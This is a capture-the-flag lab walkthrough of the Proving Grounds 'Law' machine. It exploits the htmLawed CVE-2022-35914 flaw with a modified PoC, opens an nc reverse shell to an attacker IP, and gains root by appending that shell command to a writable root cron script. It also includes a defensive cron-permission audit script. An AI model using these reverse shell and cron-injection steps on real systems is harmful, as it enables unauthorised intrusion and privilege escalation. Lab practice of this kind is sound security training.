
Proving Grounds Practice - Law

Difficulty

Medium

scan

```
[*] ssh found on tcp/22.
OpenSSH 8.4p1

[*] http found on tcp/80.
Apache/2.4.56
```

Port 80 serves htmLawed, version 1.2.5.

foothold

https://github.com/cosad3s/CVE-2022-35914-poc/blob/main/CVE-2022-35914.py

Running `python cve-2022-35914.py -u http://192.168.212.190 -c "id"` reported a failure. Reading the PoC code, I changed the default `uri` to `/index.php` and ran it again:

```python
import sys
import requests


def fail():
    # In the PoC this helper lives elsewhere in the script; it aborts on a non-200 reply.
    print("[-] target did not answer 200 on the chosen uri")
    sys.exit(1)


def exploit(url, cmd, user_agent, check, hook):
    # Original default uri of the PoC, which did not exist on this target:
    # uri = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
    uri = "/index.php"
    headers = {'User-Agent': user_agent}

    session = requests.Session()
    response_part1 = session.get(str(url) + uri, verify=False, headers=headers)
    print(response_part1.text)
    if response_part1.status_code != 200:
        fail()
    # ... rest of the PoC's exploit function unchanged (omitted here)
```

The second run succeeded and returned the command output.

Next, go straight for an nc reverse shell: `python cve-2022-35914.py -u http://192.168.212.190 -c "nc 192.168.45.234 80 -e /bin/bash"`

```
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.190] 60626
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
```

escalation

The only login account is root:

```
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
```

Upload and run linpeas; the potentially useful findings:

```
╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.5p2
```

```
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
```

```
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
/usr/bin/gettext.sh
```

```
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation
logrotate 3.18.0

Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
```

I tried the sudo escalation without success and had no other leads, so I used pspy to check for scheduled tasks first.

https://github.com/DominicBreuker/pspy?tab=readme-ov-file

pspy monitors process execution without needing root privileges. It is especially useful for catching short-lived processes that commands such as `ps -ef` never show.

pspy showed `/var/www/cleanup.sh` being executed as root every minute. Its content just deletes the Apache logs, and the file is owned by the current user, www-data, so a reverse shell command can be appended to it directly:

```
cat cleanup.sh
#!/bin/bash

rm -rf /var/log/apache2/error.log
rm -rf /var/log/apache2/access.log
ls -al cleanup.sh
-rwxr-xr-x 1 www-data www-data 82 Aug 25 2023 cleanup.sh
echo 'nc 192.168.45.234 80 -e /bin/bash' >> cleanup.sh
```
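The root cause here is a cron job that runs as root but executes a script owned by an unprivileged user. The audit script below is an added example, not part of the original walkthrough and not code from pspy or linpeas: it parses `/etc/crontab`-style text and flags every root job whose script (or parent directory) a non-root user could change. The helper names, the sample crontab and the file metadata are constructed for illustration and mirror the `www-data`-owned `cleanup.sh` found on this box; `stat_lookup` is the hook for running it against a live host.

```python
# Added audit example (not from the original walkthrough): find scripts that a
# system crontab runs as root but that a non-root user could modify.
# Helper names are hypothetical; the crontab text and file metadata below are
# constructed to mirror the misconfiguration found on the box.
import os
import re
import stat
from dataclasses import dataclass


@dataclass
class FileMeta:
    uid: int       # owner of the script
    mode: int      # permission bits of the script (e.g. 0o755)
    dir_uid: int   # owner of the containing directory
    dir_mode: int  # permission bits of the containing directory


# System crontab entry: five time fields (or an @special), a user, then the command.
_CRON_RE = re.compile(r"^\s*(@\w+|\S+(?:\s+\S+){4})\s+(\S+)\s+(.+)$")


def parse_system_crontab(text):
    """Return (user, command) for each job line; blank, comment and VAR=value lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = _CRON_RE.match(line)
        if m:
            entries.append((m.group(2), m.group(3).strip()))
    return entries


def weak_points(meta):
    """Reasons a non-root user could alter what a root job executes. Empty list means OK."""
    problems = []
    if meta.uid != 0:
        problems.append("script owned by uid %d, not root" % meta.uid)
    if meta.mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("script is group/world writable")
    if meta.dir_uid != 0:
        problems.append("parent directory owned by uid %d" % meta.dir_uid)
    if (meta.dir_mode & stat.S_IWOTH) and not (meta.dir_mode & stat.S_ISVTX):
        problems.append("parent directory world writable without sticky bit")
    return problems


def audit_root_cron(crontab_text, lookup):
    """Map absolute script path -> problems for every root job with a weak script."""
    findings = {}
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = command.split()[0]  # the file cron actually executes
        if not path.startswith("/"):
            continue  # bare command names resolve via PATH; out of scope here
        meta = lookup(path)
        if meta is None:
            continue  # missing file: nothing to check (cron would just fail)
        problems = weak_points(meta)
        if problems:
            findings[path] = problems
    return findings


def stat_lookup(path):
    """Live-host lookup via os.stat, for use as the `lookup` argument on a real system."""
    try:
        st = os.stat(path)
        parent = os.stat(os.path.dirname(path) or "/")
    except OSError:
        return None
    return FileMeta(st.st_uid, stat.S_IMODE(st.st_mode),
                    parent.st_uid, stat.S_IMODE(parent.st_mode))


# Constructed sample: uid 33 is www-data; only cleanup.sh should be flagged.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
* * * * * root /var/www/cleanup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * * root /usr/local/bin/backup.sh --full
30 2 * * * www-data /var/www/rotate.sh
"""
SAMPLE_FS = {
    "/var/www/cleanup.sh": FileMeta(uid=33, mode=0o755, dir_uid=0, dir_mode=0o755),
    "/usr/local/bin/backup.sh": FileMeta(uid=0, mode=0o755, dir_uid=0, dir_mode=0o755),
    "/var/www/rotate.sh": FileMeta(uid=33, mode=0o755, dir_uid=0, dir_mode=0o755),
}


def sample_findings():
    return audit_root_cron(SAMPLE_CRONTAB, SAMPLE_FS.get)


if __name__ == "__main__":
    for path, problems in sample_findings().items():
        print(path, "->", "; ".join(problems))
```

On a real host, call `audit_root_cron(open("/etc/crontab").read(), stat_lookup)` (and the same for each file under `/etc/cron.d`). The fix on a box like this one is the obvious one: keep root-run scripts owned by root, mode 0755 or stricter, in a root-owned directory.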

After a short wait, nc received a reverse shell as root:

```
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.190] 45784
id
uid=0(root) gid=0(root) groups=0(root)
```

Reflection

  1. There are usually several candidate privilege-escalation points and vulnerabilities. Enumerate and list them first, then work from the most likely one, both to avoid wasting time and to avoid overlooking important information.